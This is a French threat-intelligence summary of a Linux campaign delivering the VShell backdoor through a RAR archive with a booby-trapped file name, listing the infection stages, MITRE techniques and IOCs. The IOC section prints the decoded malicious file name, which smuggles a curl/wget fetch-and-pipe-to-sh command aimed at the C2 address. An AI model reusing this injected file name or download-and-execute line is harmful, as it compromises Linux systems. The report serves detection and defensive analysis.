Selon Trellix (Advanced Research Center), une campagne cible Linux via un vecteur inédit: un nom de fichier piégé dans une archive RAR qui déclenche l’exécution Bash lors d’opérations de scripts non sécurisées (eval/echo/printf). L’analyse technique détaille une chaîne fileless, multi‑étapes, aboutissant au backdoor VShell exécuté en mémoire et masqué en processus noyau.

• Étapes clés de l’infection 🐧

  • Vecteur initial (spam + .rar): un e‑mail appât renferme une archive contenant un fichier dont le nom embarque du Bash encodé Base64. L’extraction seule ne l’exécute pas; l’exécution survient lorsque des scripts manipulent les noms de fichiers sans sanitisation (ex: for f in *, eval “echo $f”, find/xargs avec eval…).
  • Stage 1 (déclencheur): le nom de fichier évalue un downloader Bash (via curl/wget) vers le C2 47.98.194.60.
  • Stage 2 (downloader): détermine l’architecture (x86, x64, ARM, ARM64), télécharge un ELF adapté, et l’exécute silencieusement avec nohup via plusieurs chemins de repli.
  • Stage 3 (loader ELF): contacte le C2, reçoit une charge XOR 0x99, la décrypte en mémoire puis l’exécute avec fexecve(), tout en se déguisant en thread noyau « [kworker/0:2] » et en évitant la ré‑infection via un marqueur (/tmp/log_de.log). L’étape initiale est alignée sur l’activité du dropper Snowlight (abus de noms de fichiers + exécution Bash).

• Charge finale: VShell (backdoor Go) 🕵️‍♂️

  • Accès distant/Reverse shell
  • Opérations fichiers (upload/download/suppression)
  • Gestion de processus
  • Port forwarding / tunneling (TCP/UDP)
  • Exécution furtive en mémoire (fexecve) et mascarade en threads noyau
  • C2 chiffré/obfusqué (XOR/HTTP)
  • Multi‑architecture Linux

• TTPs (MITRE ATT&CK)

  • Initial Access – Spearphishing via Attachment (T1566.001)
  • Execution – Command and Scripting Interpreter: Bash (T1059.004)
  • Execution – User Execution: Malicious File (T1204.002)
  • Defense Evasion – Masquerading (T1036)
  • Defense Evasion – Obfuscated/Hidden Artifacts (T1027, XOR 0x99)
  • Persistence – Implant Internal Image (T1546.012)
  • C2 – Application Layer Protocol: Web (T1071.001)
  • C2 – Ingress Tool Transfer (T1105)
  • Execution – Scheduled Task/Job (T1053, si utilisé)
  • Execution – Indirect Command Execution (T1202)

• IOCs (indicateurs de compromission) 📌

  • Archive File (SHA‑256): 5bde055523d3b5b10f002c5d881bed882e60fa47393dff41d155cab8b72fc5f4
  • Shell Script (SHA‑256): 8ef56b48ac164482dddf6a80f7367298d7b4d21be3aadf0ee1d82d63e3ac0c0a
  • 1st Stage ELF (SHA‑256):
    • 72702d6ddb671dc75e2ee6caf15f98b752df6125a43dae71cda35d305d989cf4
    • 5712d8a629d607c86a9d094dd24b4747b212d5a37b68ad7f10a84dd601fac751
    • dd1b1e6d548b32a3cde72418f1fb77353e42142676266641a9bb12447303e871
    • 69e9eabfd18445352ece9383be55077cdb5bfb790a30a86758bc5249ff6b45bb
  • Final Backdoor (SHA‑256): 73000ab2f68ecf2764af133d1b7b9f0312d5885a75bf4b7e51cd7b906b36e2d4
  • C2: 47.98.194.60
  • Nom de fichier piégé: “ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4Ljd}_bash” (variante décodée: ziliao2.pdf{echo,(curl -fsSL -m180 http://47.98.194.60:443/slw||wget -T180 -q http://47.98.194.60:443/slw)|sh }_{base64,-d}_bash)

Il s’agit d’une publication de recherche visant à documenter une chaîne d’infection Linux innovante, ses TTPs et ses IOC, afin de soutenir la détection et l’analyse défensive.

🧠 TTPs et IOCs détectés

TTP

[‘T1566.001 - Spearphishing via Attachment’, ‘T1059.004 - Command and Scripting Interpreter: Bash’, ‘T1204.002 - User Execution: Malicious File’, ‘T1036 - Masquerading’, ‘T1027 - Obfuscated/Hidden Artifacts’, ‘T1546.012 - Implant Internal Image’, ‘T1071.001 - Application Layer Protocol: Web’, ‘T1105 - Ingress Tool Transfer’, ‘T1053 - Scheduled Task/Job’, ‘T1202 - Indirect Command Execution’]

IOC

{‘archive_file_sha256’: ‘5bde055523d3b5b10f002c5d881bed882e60fa47393dff41d155cab8b72fc5f4’, ‘shell_script_sha256’: ‘8ef56b48ac164482dddf6a80f7367298d7b4d21be3aadf0ee1d82d63e3ac0c0a’, ‘1st_stage_elf_sha256’: [‘72702d6ddb671dc75e2ee6caf15f98b752df6125a43dae71cda35d305d989cf4’, ‘5712d8a629d607c86a9d094dd24b4747b212d5a37b68ad7f10a84dd601fac751’, ‘dd1b1e6d548b32a3cde72418f1fb77353e42142676266641a9bb12447303e871’, ‘69e9eabfd18445352ece9383be55077cdb5bfb790a30a86758bc5249ff6b45bb’], ‘final_backdoor_sha256’: ‘73000ab2f68ecf2764af133d1b7b9f0312d5885a75bf4b7e51cd7b906b36e2d4’, ‘c2_ip’: ‘47.98.194.60’, ‘malicious_filename’: ‘ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4Ljd}_bash’}

🔗 Source originale : https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/